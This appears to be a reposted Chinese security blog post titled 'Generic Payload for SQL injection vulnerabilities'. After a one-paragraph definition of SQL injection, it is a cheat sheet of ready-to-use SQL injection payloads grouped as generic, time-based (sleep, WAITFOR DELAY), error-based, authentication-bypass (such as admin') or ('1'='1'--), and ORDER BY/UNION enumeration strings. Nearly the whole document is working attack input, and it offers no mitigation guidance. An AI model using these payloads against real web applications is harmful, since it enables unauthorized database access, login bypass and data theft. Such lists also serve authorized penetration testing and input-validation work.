Generic Payload for SQL injection vulnerabilities
2022-10-9 21:50:44 Author: 猫因的安全(查看原文) 阅读量:10 收藏

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严 攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句 在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

通用SQL注入payload

' or '

-- or #

' OR '1

' OR 1 -- -

OR "" = "

" OR 1 = 1 -- -"

' OR '' = '

'='

'LIKE'

'=0--+

OR 1=1

' OR 'x'='x

' AND id IS NULL; --

'''''''''''''UNION SELECT '2

基于时间的payload

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

';WAITFOR DELAY '0:0:30'--

基于通用错误的payload

OR 1=1

OR 1=1#

OR x=y#

OR 1=1--

OR x=x--

OR 3409=3409 AND ('pytW' LIKE 'pytW

HAVING 1=1

HAVING 1=1#

HAVING 1=0--

AND 1=1--

AND 1=1 AND '%'='

WHERE 1=1 AND 1=0--

%' AND 8310=8310 AND '%'='

基于认证的payload

' or ''-'

' or '' '

' or ''&'

' or ''^'

' or ''*'

or true--

" or true--

' or true--

") or true--

') or true--

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/

Order by和UNION的payload

1' ORDER BY 1--+

1' ORDER BY 2--+

1' ORDER BY 3--+

1' ORDER BY 1,2--+

1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+

1' GROUP BY 1,2,3--+

' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+

' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@

-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

'

AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --


文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjMyNDcxMg==&mid=2247497002&idx=1&sn=d55fba374eb374df1f13d0d9f3b78583&chksm=c30560adf472e9bbf33c96b63d5b077558c3e745ff4d4868f1e5fec03dd857a5f81019ead04d#rd
如有侵权请联系:admin#unsafe.sh